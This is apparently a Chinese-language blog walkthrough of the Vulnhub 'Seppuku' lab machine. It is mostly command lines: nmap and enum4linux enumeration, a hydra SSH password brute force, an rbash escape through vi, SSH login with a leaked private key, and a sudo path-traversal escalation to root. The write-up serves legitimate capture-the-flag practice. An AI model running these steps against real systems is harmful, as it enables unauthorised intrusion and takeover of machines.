kali:192.168.111.111
靶机:192.168.111.212
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.212
对samba服务进行枚举发现三个系统用户
enum4linux -a 192.168.111.212
在7601端口下的secret目录发现password.lst密码字典,配合收集到的系统用户爆破ssh
hydra -L user.txt -P password.txt 192.168.111.212 -s 22 ssh -t 64
提权
通过vi编辑器绕过rbash
vi
:set shell=/bin/bash
:shell
在seppuku用户加目录下发现.passwd文件
尝试后发现可以切换到samurai用户
samurai用户sudo权限,提权需要在tanto用户家目录下创建文件
在/var/www/html/keys目录下发现tanto用户的ssh私钥
使用该私钥登录目标
ssh [email protected] -i id_rsa
在tanto用户加目录下创建.cgi_bin目录,目录下创建名称为bin的可执行文件
mkdir -p .cgi_bin/bin
cd .cgi_bin
echo '/bin/bash' > bin
chmod 777 bin
使用samurai用户执行以下命令提升为root
sudo -u root /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
flag
标签:bin,..,Seppuku,用户,192.168,111.212,Vulnhub,tanto,靶机 From: https://www.cnblogs.com/ctostm/p/17178955.html